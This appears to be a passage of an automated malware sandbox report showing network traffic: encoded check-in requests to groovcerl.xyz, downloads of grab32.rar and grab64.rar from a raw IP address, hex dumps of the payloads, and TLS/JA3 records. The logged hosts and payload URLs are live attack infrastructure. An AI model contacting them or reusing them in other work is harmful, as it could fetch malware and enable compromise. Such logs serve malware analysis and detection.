                                                                                                                                                                                                  Data Ascii: 47dbc5Jgb7rWPXyPQpoJkKLVDJAQK6MdiLg7JnIi3RcDU5PxpNRX47UkXo+vSfZwaTYA1Z3ZiH3/3vLK7+SQ4qls1JdGkCItV3ne2IX2aB4G64Iq/krQ3gSABWoDBtkK9h4LWA4OjWHcPQLQbcIk7sMKJQ57Is01S3Uc03s58nZpNYZcZZScWzrm6NdaOrxXFCJPRgvV2j/aGFT3Uc8d44M2q2DvpOYi1FsHOKz1dZE/C57qXup5Ym7Qcjh+vtCxwY2Miu9pNfrH3ZQeHXbSqWO3e4+b/LNy2lYl3rMji0dzvi5fWYp8iSliDje+ebcFHdAsc+wJ3J1dTMkTv69WJXtcbAtisyjc19T1rTI8OVW6A2TGEJ+tip/wp1whBex9AkMO83Zs5L4H23ekZzVt6P4cqL7t4YC1VzAJ6r+LBB5niRePR3M3H2KYvIPzuNirMrRpPw6Xnu+xPIT6WqXptbs4OUVHp48rRxy9RO88atMd7aYQlFFz6hcnsxOjpzEfNNwx22eXfYA6l2DlK8ks0P+oeRfbbC2MxC3727VJO7sWH+6x3AyxA6VW2JT8mIW4ZBcoW7JIP37avK1tXtwUewsm3tg+aW37WLWA0fMlPCqdWWth40R4VqjgnZHi/TlSKpTroH8N1hi6UqTWQk1xGcsKUqj0gc/czf8zzEXsDs8Mg7Gj5+tNuKsEygv1znGAOm2JBDfUFX+vtdib2mMtF6YJRuNCP9rQOo+GpTTr62a5RVheq45NJ4P9jGDWWI4WntuEGZHUv68PV2OdzZwVYy3FVsR3ox8UpzGBCJGCPSey0RIgn/ctApYl7+IlUsh5+9uHSy8m76N3+Awk+mJh7++HjZWxIudjKa+w/AcHQIselDdkVzFT3t0gpO5boJZ1m5Ohnpki0M4nbyrq5MUdHaw2mJGCMAsdFVkPBXGkIVaSg7nOMIjXrnP


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  2192.168.2.749769162.0.213.23080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 25, 2020 19:07:15.279915094 CET3566OUTGET /images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemWY/lVp7AN_2F/YEmcQ_2BEaBJyDUMlsGk/jN8oDN7xGQMygxh4f9g/_2FyagJjAZDLRvoreYuui8/LRxePg_2BGB0U/MpT06eFx/VfNkohToJFJcoGZ4_2Bgo5f/Opt0pN_2FL/JG_2FCiZ4ufIuI3kc/AT1ZiYCskKpp/v3TP_2FuS2b/9i.avi HTTP/1.1
                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  Host: groovcerl.xyz
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
                                                                                                                                                                                                  Nov 25, 2020 19:07:15.467380047 CET3568INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Wed, 25 Nov 2020 18:07:15 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Content-Length: 2364
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Data Raw: 31 64 73 77 38 44 56 43 68 43 31 5a 34 58 7a 75 33 49 32 4b 63 32 7a 2f 39 72 6d 46 43 35 6d 73 38 39 4a 77 50 55 55 45 56 76 2f 4e 38 6f 55 47 43 4f 36 4b 46 54 72 63 6f 6f 75 4f 74 43 50 63 46 4e 4e 53 57 48 70 45 73 4d 6b 51 4c 55 76 32 6a 78 31 4f 66 61 4e 42 78 35 45 46 37 42 48 69 48 68 78 73 61 31 55 63 30 49 31 58 2b 2f 45 37 2b 78 68 7a 48 33 57 4e 4b 4a 67 4d 39 6c 44 2f 76 47 5a 47 76 5a 79 4c 64 69 52 44 6f 59 6c 53 41 6b 45 64 36 76 5a 30 77 77 79 46 79 42 67 61 2f 4c 59 68 44 68 6f 6a 55 51 58 2f 63 61 30 7a 47 6c 59 41 32 78 74 75 69 49 70 72 6b 39 63 4d 2b 7a 77 2f 32 64 30 75 48 65 63 43 53 30 2f 4c 5a 4e 6c 7a 2b 48 59 6c 58 7a 63 55 43 55 47 73 75 74 34 75 73 73 71 51 48 54 55 2b 4b 6e 39 44 69 59 4d 61 75 4f 6e 65 46 70 5a 42 48 32 57 46 54 46 67 4a 30 44 37 68 42 48 32 71 50 70 42 51 52 70 6a 67 73 76 59 43 42 2b 46 4e 6c 32 38 6f 59 44 37 67 51 35 39 68 4a 65 6d 4b 36 42 67 6a 57 63 63 78 6a 62 6c 4f 53 72 45 75 53 72 52 64 38 48 2f 63 4c 78 6d 79 71 57 58 39 51 78 64 6a 55 62 46 39 45 50 73 48 4e 55 58 58 4d 70 74 4f 41 46 52 2f 55 50 42 52 65 43 78 44 5a 65 48 67 6d 48 2f 53 61 4b 4a 6d 61 4e 52 77 68 36 67 2b 59 51 78 5a 59 30 59 51 45 31 45 44 46 2f 58 6f 44 6b 65 33 63 64 4f 50 43 4b 79 4d 39 4d 55 30 4a 68 36 70 57 69 79 36 64 30 56 73 30 44 69 78 6e 79 55 79 49 65 59 50 67 50 6b 4c 4a 78 30 33 36 38 32 4b 45 4e 54 35 70 33 31 37 78 72 79 74 71 49 41 72 2f 45 54 7a 73 56 4d 48 4b 53 53 4f 54 47 48 37 54 67 45 6b 54 76 72 6f 32 43 59 66 47 67 4d 42 47 56 78 56 45 38 2f 47 6a 6c 6d 76 5a 41 53 33 79 62 77 53 6d 6a 46 35 72 30 6a 52 4e 6d 46 67 47 75 44 6c 4d 65 6f 67 76 42 45 62 56 6e 46 51 56 4f 4d 37 36 32 38 41 78 4f 37 34 73 72 78 44 56 53 34 44 66 70 47 34 41 70 6d 30 68 5a 71 38 61 35 51 42 54 31 6b 6b 54 70 79 66 55 39 4e 70 64 72 6b 32 72 71 71 79 7a 65 33 70 74 4d 71 69 77 6d 34 57 39 7a 35 77 57 63 46 4b 6d 4d 4b 35 44 77 46 51 54 4a 6e 4e 50 6d 43 7a 33 32 70 54 30 4f 68 49 72 57 50 59 30 4e 75 41 2b 6c 6d 44 47 31 68 4f 57 50 32 6e 5a 48 36 59 6a 72 47 79 37 53 31 73 52 44 4e 2b 42 66 67 66 38 33 51 38 4a 39 74 59 55 50 4d 48 4d 52 55 63 65 2b 70 66 66 6e 62 65 48 47 56 35 53 43 2b 34 74 79 69 5a 2b 6b 4e 55 79 2f 46 79 78 77 57 61 66 37 6c 39 41 77 79 49 55 45 72 74 43 38 43 50 38 79 5a 62 53 55 67 67 71 30 62 59 42 79 34 65 71 46 4d 48 35 68 70 46 51 46 6a 2b 4a 64 48 44 69 53 79 64 35 2b 78 6d 65 36 74 79 4b 4b 43 6f 43 59 35 43 6c 47 6f 61 64 47 4b 35 51 42 65 2f 72 69 32 53 6e 51 54 76 45 4f 34 6c 6f 73 68 4a 65 42 2f 79 31 30 2f 4e 32 41 30 7a 43 74 74 30 54 43 49 76 47 2b 55 6c 71 69 48 59 34 69 68 6e 58 34 55 2b 2b 33 78 38 34 43 6a 64 6c 52 47 58 4e 6a 66 50 6b 61 67 6e 6a 32 38 5a 41 4c 43 35 64 52 4a 50 55 34 38 5a 50 73 44 59 30 6f 61 50 69 36 38 6f 50 6c 47 74 76 77 6f 35 59 77 54 59 39 6b 76 51 35 4e 74 34 61 4c 59 55 72 72 77 39 38 7a 52 38 69 73 67 48 4f 4c 7a 67 77 7a 53
                                                                                                                                                                                                  Data Ascii: 1dsw8DVChC1Z4Xzu3I2Kc2z/9rmFC5ms89JwPUUEVv/N8oUGCO6KFTrcoouOtCPcFNNSWHpEsMkQLUv2jx1OfaNBx5EF7BHiHhxsa1Uc0I1X+/E7+xhzH3WNKJgM9lD/vGZGvZyLdiRDoYlSAkEd6vZ0wwyFyBga/LYhDhojUQX/ca0zGlYA2xtuiIprk9cM+zw/2d0uHecCS0/LZNlz+HYlXzcUCUGsut4ussqQHTU+Kn9DiYMauOneFpZBH2WFTFgJ0D7hBH2qPpBQRpjgsvYCB+FNl28oYD7gQ59hJemK6BgjWccxjblOSrEuSrRd8H/cLxmyqWX9QxdjUbF9EPsHNUXXMptOAFR/UPBReCxDZeHgmH/SaKJmaNRwh6g+YQxZY0YQE1EDF/XoDke3cdOPCKyM9MU0Jh6pWiy6d0Vs0DixnyUyIeYPgPkLJx03682KENT5p317xrytqIAr/ETzsVMHKSSOTGH7TgEkTvro2CYfGgMBGVxVE8/GjlmvZAS3ybwSmjF5r0jRNmFgGuDlMeogvBEbVnFQVOM7628AxO74srxDVS4DfpG4Apm0hZq8a5QBT1kkTpyfU9Npdrk2rqqyze3ptMqiwm4W9z5wWcFKmMK5DwFQTJnNPmCz32pT0OhIrWPY0NuA+lmDG1hOWP2nZH6YjrGy7S1sRDN+Bfgf83Q8J9tYUPMHMRUce+pffnbeHGV5SC+4tyiZ+kNUy/FyxwWaf7l9AwyIUErtC8CP8yZbSUggq0bYBy4eqFMH5hpFQFj+JdHDiSyd5+xme6tyKKCoCY5ClGoadGK5QBe/ri2SnQTvEO4loshJeB/y10/N2A0zCtt0TCIvG+UlqiHY4ihnX4U++3x84CjdlRGXNjfPkagnj28ZALC5dRJPU48ZPsDY0oaPi68oPlGtvwo5YwTY9kvQ5Nt4aLYUrrw98zR8isgHOLzgwzS


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  3192.168.2.74977163.250.47.20080C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 25, 2020 19:07:57.769932985 CET3881OUTGET /grab32.rar HTTP/1.1
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                                                                                                                                                                  Host: 63.250.47.200
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Nov 25, 2020 19:07:57.940072060 CET3882INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Wed, 25 Nov 2020 18:07:57 GMT
                                                                                                                                                                                                  Server: Apache/2.4.37 (centos)
                                                                                                                                                                                                  Last-Modified: Thu, 27 Aug 2020 16:30:09 GMT
                                                                                                                                                                                                  ETag: "54049-5adde731a4640"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Content-Length: 344137
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/vnd.rar
                                                                                                                                                                                                  Data Raw: c0 a6 4f 18 4c 2e 4f f5 ac 56 c3 3a 54 0e 18 7c 6c 03 2e cb da 4b ab f2 2f 1e b9 75 d9 80 b0 e6 b7 55 ca de 2e e3 21 5b f4 30 90 75 17 5d 9e 47 12 0b d1 3d 27 a8 62 13 ca 3f 27 2d 24 e2 b8 c6 77 d6 9d 8b 14 ad 17 25 64 2c fd 42 a9 7e 3d c8 a2 cc ca be d1 5c 60 c5 0f 09 ba 6c 98 51 1d a0 6d f2 e0 6b e1 5e e2 a4 1a 60 ed 3e dc c4 bb 15 ac e9 60 d2 3a 21 bb 2a 14 b2 85 38 4c 81 de 00 5b 50 94 c5 1b 0b 46 1e 24 0b 7e 50 0a f9 56 31 3e 56 ae 24 e6 cf 39 c6 c8 bf 75 d2 44 a2 29 89 a1 a0 1e fa 19 7e 64 51 42 9b f5 92 e5 d6 b9 c5 79 d8 0f 0b 8d 6e e3 1a f4 b2 4f 6b 3c 66 a5 d7 26 8a bf c7 6f dc ab 6d 86 27 82 bc a1 0a 95 57 0a df f4 05 a1 55 48 9a eb a4 aa c0 00 38 db 68 3b ec 1e eb 60 53 b4 1d 89 f8 3c 36 d1 eb 29 0a bf 17 e1 7a 43 79 30 8d 38 d6 93 b5 31 d4 65 7a fe 8f fb 03 f0 e5 06 50 3a c7 ef 97 d6 c5 7b 17 8a b6 3b 26 6d 6a f1 37 df 35 ed 4a 16 5b d7 4a 0f a5 ae 8e 5c 13 56 63 7e e4 94 20 e4 f0 cb 4a 2c 34 ce 6b 10 1e 2a 99 69 37 ef 65 26 81 b4 e1 43 5a 41 c1 a4 88 2b 41 3e 79 f2 6a 73 1c 5e 54 6d 96 17 02 40 a6 af a2 1e 42 a9 ac 68 b5 dc 24 63 5d 50 1c 81 fb 4b 8d d6 83 78 ff 78 bf a4 9a 36 4d 30 35 96 56 5b 82 a0 60 65 de 20 86 bc 2f 23 11 fd 5d 31 fb 8a af b2 ba de ab 88 c5 38 f0 f6 84 05 fa d8 57 55 06 09 09 fa 4a 2b ad 4a f7 29 60 5a 97 a6 37 56 78 53 aa 2d cd a2 52 ca 27 71 00 ca 50 bb e3 d5 f3 f6 bf 32 f6 bb 2e 86 ba 58 28 e0 f2 f6 1d 05 d7 06 da 6c bc bb 58 1d 0c a1 a6 a1 b2 aa 3a f9 a6 aa 2a f5 53 87 f2 ac b9 e9 b0 ee aa 27 0e 2f 41 2d 9e 55 7e 5e f8 87 5f 2a 65 f3 40 a3 ff 46 2c 81 f4 2a d8 22 b8 e0 bd 02 39 c7 15 de e3 fa b2 1f ed 40 d6 5b 21 e9 d2 02 4f 10 3c b5 d9 56 81 5a ce 78 2d 4a 01 d9 76 67 5a f1 0d 85 52 b1 5d fe f2 4e bf 90 ed 2f d0 cd 10 e0 df 9b 63 d0 f7 58 28 dc ac f7 93 74 54 eb ac 4b be a0 2b 40 fe 28 b9 db 95 51 d5 a0 25 9a 96 a7 cd 84 67 4e b4 1b 8b 73 5f 36 8b 8f c0 4b 19 6c 6d f2 a5 d6 de b2 96 a9 65 b4 97 22 02 6b 44 4a ca 82 07 66 18 6b a6 7a 78 44 07 71 0a c8 b6 c6 f4 ae ae cd f9 09 7f 7c f4 91 07 e0 37 3a b5 53 38 9f 95 b8 85 d6 9a f0 22 32 ae d2 72 78 fc cc e1 92 a3 c8 69 03 6f f3 0f f5 79 ab 76 20 87 bf fc a3 0b 9e 6a d5 41 09 d4 c4 1f 62 8f 3b 6c 67 4d 97 96 db 60 17 01 66 99 59 b3 31 0b 0f 1e 01 6c 55 0f 26 12 73 f8 f8 ba 5e 2b 51 f0 e3 b9 0d 56 2f 71 99 f2 e5 31 00 18 fe dc 9e e8 d3 f0 9f 13 a5 b2 b3 18 73 d6 f3 15 fd c5 fa aa 2c 68 b0 71 83 5d f9 07 a4 9d ef 5c ea 98 f5 4f 38 83 14 7a d7 75 c1 2a 91 99 97 de 18 72 dc 1a a3 1d 77 25 b7 88 8e d1 c0 76 9d ff d7 ac 57 70 e0 02 98 59 34 f3 17 b3 4b de b6 5d f9 3b 42 4c 5b 30 ef 35 f1 7c d9 28 8c dc 55 48 2b d7 6a fc 5a c1 a9 d5 c6 a2 d5 71 20 85 39 26 0e 80 a2 7b 80 0d 5a 52 6a 63 30 00 9a 1b 39 b3 54 b0 5d 03 90 55 a6 4c f5 64 80 34 28 0b e9 87 ef 44 89 d1 c4 7e 15 2f ac 5c bb ff db 56 5d 76 a0 b6 b7 20 2c 8d bd 82 e5 e1 0d 7d 6c eb c3 a9 96 99 03 16 fb b2 04 29 b5 94 54 e4 87 1b e0 b4 73 04 6c 67 a3 9a b7 96 e2 37 62 11 af 5a bb 9f b8 23 fa ef 4d 9b 6e e9 30 83 2e 6d 15 7e 89 b4 79 1b 2a 41 77 b0 f3 e8 08 be a0 74 90 c8 81 1e d1 84 26 80 42 99 e1 17 27 0f 74 bd 7b 77 ce 13 e0 26 de 38 4d 10 cb 1a b8 07 ce a9 f1 4f 39 c8 b5 f9 c4 17 ef 5b e3 91 7b 75 33 78 51 14 f8 de 73 e6
                                                                                                                                                                                                  Data Ascii: OL.OV:T|l.K/uU.![0u]G='b?'-$w%d,B~=\`lQmk^`>`:!*8L[PF$~PV1>V$9uD)~dQBynOk<f&om'WUH8h;`S<6)zCy081ezP:{;&mj75J[J\Vc~ J,4k*i7e&CZA+A>yjs^Tm@Bh$c]PKxx6M05V[`e /#]18WUJ+J)`Z7VxS-R'qP2.X(lX:*S'/A-U~^_*e@F,*"9@[!O<VZx-JvgZR]N/cX(tTK+@(Q%gNs_6Klme"kDJfkzxDq|7:S8"2rxioyv jAb;lgM`fY1lU&s^+QV/q1s,hq]\O8zu*rw%vWpY4K];BL[05|(UH+jZq 9&{ZRjc09T]ULd4(D~/\V]v ,}l)Tslg7bZ#Mn0.m~y*Awt&B't{w&8MO9[{u3xQs
                                                                                                                                                                                                  Nov 25, 2020 19:07:59.736968994 CET4243OUTGET /grab64.rar HTTP/1.1
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                                                                                                                                                                  Host: 63.250.47.200
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Nov 25, 2020 19:07:59.911725998 CET4245INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Wed, 25 Nov 2020 18:07:59 GMT
                                                                                                                                                                                                  Server: Apache/2.4.37 (centos)
                                                                                                                                                                                                  Last-Modified: Thu, 27 Aug 2020 16:30:15 GMT
                                                                                                                                                                                                  ETag: "71a4e-5adde7375d3c0"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Content-Length: 465486
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/vnd.rar
                                                                                                                                                                                                  Data Raw: ea 33 ad 3d 68 e9 26 c2 a0 1b d2 21 80 38 b6 5e 74 82 25 e4 8f c4 e3 57 d6 75 7c 59 8f 86 09 61 56 ca a8 23 8d fe 9a 04 76 78 1a 6d fd 58 6d f9 01 18 34 bb 93 8b 4d 7a 6f 57 eb 17 5f 13 51 ed a8 5c 96 9e 2e 77 63 52 38 b2 7d 20 d5 94 5b 31 97 72 f1 b8 34 0c 87 d9 dd 13 c3 3a 84 14 55 61 93 70 03 05 db 7e d8 0c 79 6b 6e 1b 3b 3f 66 1e eb 82 22 28 51 75 4f eb 51 b0 05 ce 7e 52 f7 04 b0 eb 36 14 e7 db d7 83 d1 0d db 00 2b 51 19 ec b5 4c 9f f1 f6 4e 51 44 55 71 5e b7 16 6d 99 5c f5 ec ab 28 88 83 e1 9f e0 69 29 e5 2e 1e 0b 29 26 28 ee e1 11 eb 51 e5 a5 de 9a e4 9e de 3d 39 4a 17 a7 34 43 55 81 58 d2 0b 85 0a 95 b6 26 34 23 99 17 b8 0e 13 ea a2 72 33 1f bc cd 3e d7 54 38 38 73 10 93 29 86 9f f1 90 a8 98 d1 4e d1 ec 5b ff 52 9c 46 8c 36 94 72 c2 9f ca 09 05 65 7c 88 39 de ad 5f ab 81 0a 11 b1 b2 e3 05 1a 29 28 d4 ec 1b 10 92 47 40 bd 5f 9f d0 e2 f2 c2 17 3d 5e 9e c9 6d 73 ff 48 0b 96 3a 85 20 c4 cf 0b 93 da a8 11 38 06 8c 60 1a 2f 51 2a 93 0a 34 f8 58 ac 50 7a 76 d1 80 44 8b 20 97 19 a3 ff 97 c3 f3 0d 2f 17 65 56 54 b2 cc c9 26 b3 f5 bf 6b 35 3c 81 40 a0 7d aa 6b 82 29 0b 8f a3 12 22 20 be 4f 15 36 f1 a9 b3 50 2a 01 8c ff ce 16 28 92 71 74 64 75 35 b7 82 c6 ea 93 4a e8 d7 57 44 a0 ef eb 84 0b b1 f2 14 da e8 eb 5e 2c 2f b7 e7 11 82 2e b8 ab 80 fc be da 3a 95 20 a2 2c 55 18 80 f1 ce 8b 7d a6 9a 28 5f bf e9 0b 2e e2 da 55 f5 30 d8 5f 08 12 c4 54 08 f4 30 04 6c b7 f3 d5 74 de 5d cc 4f 18 d1 b3 ff 1f 69 13 4d 69 eb 45 90 3f de 25 71 63 4d 76 ae 24 6a 11 65 fb ee 4e c0 56 6a 5b 96 b3 28 c7 11 ca 71 b7 ab 18 92 f1 a5 3f e3 6c a1 c4 92 ce a0 59 29 8a 97 6a db 9f 18 a3 a8 6f e5 0a 62 c3 f7 24 a3 03 34 9d d4 67 39 7e 55 c7 e8 ba f7 4f 5e 7b 90 df c7 24 15 b4 b7 e1 77 1e d6 08 dd 7a 09 82 40 93 f3 51 0c 9e 12 33 f2 5f 1f 3c c4 88 f9 4a a1 5e 1f bd 09 16 82 fc ca 16 09 13 d9 40 5b 49 b3 89 c1 94 47 76 74 e2 7c 7b 4a 50 e4 0e 46 05 58 c9 ad ea 4f 18 78 b6 50 89 4d 8b ba 08 63 6b 2f fe fb 4b f6 b3 a3 e8 4c 5c db ad 25 2b a0 62 e2 a3 a1 10 28 e5 5c ba 49 05 00 fe 14 1a 40 89 07 4b 00 e3 84 40 94 88 ea 62 fc f8 dd 3c 4b bf 03 84 d3 c2 12 23 cc e2 66 4e a2 20 d0 ea 85 23 ca d5 81 7b de f5 39 87 14 e6 db 52 b7 61 2b 2f 46 d0 60 94 86 e3 6e cf fc 63 26 c7 7e 74 9a 22 8c ad be 86 3d f6 21 92 a9 26 36 13 06 6f ed 02 3f 2a fa 46 07 9d 43 bd 9f ca 0b de 06 77 4e 8a f9 28 5d 26 65 67 c9 ce dc a8 c1 5d af fb fe cc c8 7e 9a c6 3b 8a db 1a 64 3b d9 24 03 e0 59 e9 69 ee e4 4f 17 84 7d 4c ed 3e 59 66 c7 69 e0 e9 22 dd 14 2d aa 09 b6 d8 c4 93 86 33 ba 3b 4a 85 fd 76 e1 cb 69 b9 31 a0 9c be a1 f9 bd ef a7 9a 81 ef 55 37 44 18 7f 5b fe a3 06 cc df 6f 1b fe e9 46 5d 96 c2 dd c3 44 cf 96 e4 50 33 0a bd f2 68 e2 c4 4c ce e4 0b 86 dc cc 9a 88 01 4a 7c 00 a2 03 a0 15 18 2b fe 48 34 79 8d 37 ec 2c ac e2 c4 f3 5e bb 04 2b 5f cb 02 45 26 bd c3 df 28 cc 3f e8 da af 5c 04 83 24 34 90 c2 ef 07 89 98 fe d0 d3 5d d7 bb fa 59 a0 91 f9 b3 21 96 db 1f f3 28 d4 25 04 99 34 35 11 e1 d9 ba 67 a7 69 b2 2b 20 25 5e eb 65 fd e0 17 e9 26 c3 5a 9b f9 ae 49 f4 43 15 6a 5d 64 0f da 3a a3 60 8b a4 95 86 88 7f c2 33 f5 cb 62 71 56 fe 47 6e 8f 44 8f 30 e8 6c dc 2f 8c 85 28 92 d5 ce c0 48 84 c6 a3 0f f7 98 6c 27 64 38 ad f3 7e
                                                                                                                                                                                                  Data Ascii: 3=h&!8^t%Wu|YaV#vxmXm4MzoW_Q\.wcR8} [1r4:Uap~ykn;?f"(QuOQ~R6+QLNQDUq^m\(i).)&(Q=9J4CUX&4#r3>T88s)N[RF6re|9_)(G@_=^msH: 8`/Q*4XPzvD /eVT&k5<@}k)" O6P*(qtdu5JWD^,/.: ,U}(_.U0_T0lt]OiMiE?%qcMv$jeNVj[(q?lY)job$4g9~UO^{$wz@Q3_<J^@[IGvt|{JPFXOxPMck/KL\%+b(\I@K@b<K#fN #{9Ra+/F`nc&~t"=!&6o?*FCwN(]&eg]~;d;$YiO}L>Yfi"-3;Jvi1U7D[oF]DP3hLJ|+H4y7,^+_E&(?\$4]Y!(%45gi+ %^e&ZICj]d:`3bqVGnD0l/(Hl'd8~


                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.353063107 CET151.101.1.44443192.168.2.749746CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.353626966 CET151.101.1.44443192.168.2.749747CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.353844881 CET151.101.1.44443192.168.2.749750CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.354784966 CET151.101.1.44443192.168.2.749749CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.357801914 CET151.101.1.44443192.168.2.749751CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
